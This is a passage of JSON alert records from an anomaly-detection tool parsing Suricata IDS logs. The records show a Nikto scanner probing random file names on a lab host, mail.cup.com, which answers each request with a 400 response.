"/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.btr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.btr\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.btr\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.btr", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.btr", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46842, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1638959504063480,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1638959504063480, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.229692+0000\",\"flow_id\":1638959504063480,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.btr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.btr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.231549 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46844 -> 192.168.10.154:80", "/parser/model/time": 1583349514.231549, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46844, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.231549 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46844 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.list", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.231715+0000\",\"flow_id\":212665289573775,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.list\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.list\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.231715, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":212665289573775,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.list\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.list\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.list\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.list\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.list\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.list\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.list", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.list", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46844, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":212665289573775,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 212665289573775, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.231715+0000\",\"flow_id\":212665289573775,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.list\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.list\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.233219 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46846 -> 192.168.10.154:80", "/parser/model/time": 1583349514.233219, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46846, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.233219 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46846 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.EXE", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.233382+0000\",\"flow_id\":1641910146599993,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.EXE\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.EXE\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.233382, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1641910146599993,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.EXE\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.EXE\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.EXE\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.EXE\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.EXE\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.EXE\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.EXE", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.EXE", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46846, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1641910146599993,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1641910146599993, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.233382+0000\",\"flow_id\":1641910146599993,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.EXE\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.EXE\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.235199 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46848 -> 192.168.10.154:80", "/parser/model/time": 1583349514.235199, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46848, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.235199 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46848 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.java", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.235367+0000\",\"flow_id\":1729286961271675,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.java\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.java\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.235367, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1729286961271675,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 